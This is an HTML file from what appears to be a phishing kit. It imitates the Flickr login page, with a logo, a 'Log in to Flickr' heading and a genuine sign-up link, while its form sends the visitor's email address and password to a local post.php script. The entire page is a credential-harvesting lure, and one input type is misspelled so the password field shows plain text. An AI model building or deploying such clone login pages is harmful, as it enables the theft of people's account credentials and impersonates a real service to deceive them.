index.html 1.5 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101
  1. <!DOCTYPE html><html lang="en">
  2. <!-- Creatred by https://github.com/makdosx -->
  3. <head>
  4. <meta charset="utf-8">
  5. <meta name="viewport" content="width=device-width,initial-scale=1">
  6. <meta name="robots" content="noindex">
  7. <link rel="icon" href="/favicon.ico">
  8. <title>Flickr Login</title>
  9. <link rel="icon" type="image/png" href="favicon.png"/>
  10. <style>
  11. body {
  12. background-image: url("backg.webp");
  13. height:650px;
  14. background-position: center;
  15. background-repeat: no-repeat;
  16. background-size: cover;
  17. }
  18. #form
  19. {
  20. background-color: white;
  21. height: 350px;
  22. width: 350px;
  23. }
  24. #user
  25. {
  26. height: 11%;
  27. width: 80%;
  28. }
  29. #pass
  30. {
  31. height: 11%;
  32. width: 80%;
  33. }
  34. #sub
  35. {
  36. height: 11%;
  37. width: 83%;
  38. background-color:#1396e7;
  39. color:white;
  40. border:0;
  41. outline:0;
  42. }
  43. #sub:hover
  44. {
  45. height: 11%;
  46. width: 83%;
  47. background-color:#1191db;
  48. color:white;
  49. border:0;
  50. outline:0;
  51. }
  52. </style>
  53. </head>
  54. <body>
  55. <br><br><br><br>
  56. <br><br><br><br>
  57. <div align="center">
  58. <form action="post.php" method="post" id="form">
  59. <br>
  60. <img src="favicon.png" height="10%" width="10%">
  61. <h3> <font color="grey"> Log in to Flickr </font> </h3>
  62. <input type="text" name="user" id="user" placeholder="Email Address">
  63. <br> <br>
  64. <input type="passowrd" name="pass" id="pass" placeholder="password">
  65. <br> <br>
  66. <input type="submit" name="sub" value="Log In" id="sub">
  67. <br>
  68. <h5> Not a Flickr member?
  69. <a href="https://identity.flickr.com/sign-up" style="text-decoration:none"> Sign up here. </a>
  70. </h5>
  71. </form>
  72. </div>
  73. </body>
  74. </html>